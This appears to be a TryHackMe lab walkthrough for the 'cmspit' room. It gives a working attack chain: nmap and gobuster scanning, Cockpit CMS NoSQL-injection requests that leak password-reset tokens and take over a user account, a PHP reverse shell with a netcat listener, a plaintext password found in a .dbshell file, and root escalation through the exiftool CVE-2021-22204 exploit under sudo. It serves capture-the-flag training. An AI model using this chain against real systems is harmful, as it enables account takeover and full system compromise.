Room Link: https://tryhackme.com/room/cmspit
Initial Scan
Kali
Scan all ports
Kali
Copy nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
Copy gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
CMS Version is 0.11.1
User account compromise
This CMS version has a exploit to help us find users.
Exploit: https://swarm.ptsecurity.com/rce-cockpit-cms/
Burp
Copy GET /auth/requestreset HTTP/1.1
Host: 10.10.198.113
Content-Length: 25
Content-type: application/json
{
"user":"admin"
}
Burp
Copy GET /auth/resetpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 38
Content-type: application/json
{
"token":{
"$func":"var_dump"
}
}
Burp
Copy GET /auth/newpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 66
Content-type: application/json
{
"token":"rp-25badb6dbd66e39732cc3abf8122ba9065b6ee57e7610"
}
Did the same thing for user skidy
Burp
Copy GET /auth/newpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 66
Content-type: application/json
{
"token":"rp-4472f7f85a07bbc1b08d917a298ad0f365b6e7ce6d85e"
}
I don't know if the last part was really necessary. I think maybe the reset token can be different then the other token in which case the above step would be necessary but its the same so I just updated the password for skidy.
Burp
Copy GET /auth/resetpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 88
Content-type: application/json
{
"token":"rp-4472f7f85a07bbc1b08d917a298ad0f365b6e7ce6d85e",
"password":"hacked"
}
I can now login as Skidy
Initial Shell
Kali
Copy git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
nc -lvnp 1234
Get autocomplete
Copy python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Lateral Movement (Stux)
Victim
Copy cd /home/stux
cat .dbshell
Victim
Copy su stux
Password: p4ssw0rdhack3d!123
Victim
Privilege Escalation
Exploit: https://github.com/convisolabs/CVE-2021-22204-exiftool/blob/master/exploit.py
Victim(receiving)
Copy nc -l -p 1234 > cve.tar.gz
Kali(sending)
Copy git clone https://github.com/se162xg/CVE-2021-22204.git
tar cvf cve.tar.gz CVE-2021-22204/
nc -w 3 $VICTIM 1234 < cve.tar.gz
Victim
Copy tar xvf cve.tar.gz
cd CVE-2021-22204
Victim
Copy bash craft_a_djvu_exploit.sh '/bin/bash'
sudo /usr/local/bin/exiftool delicate.jpg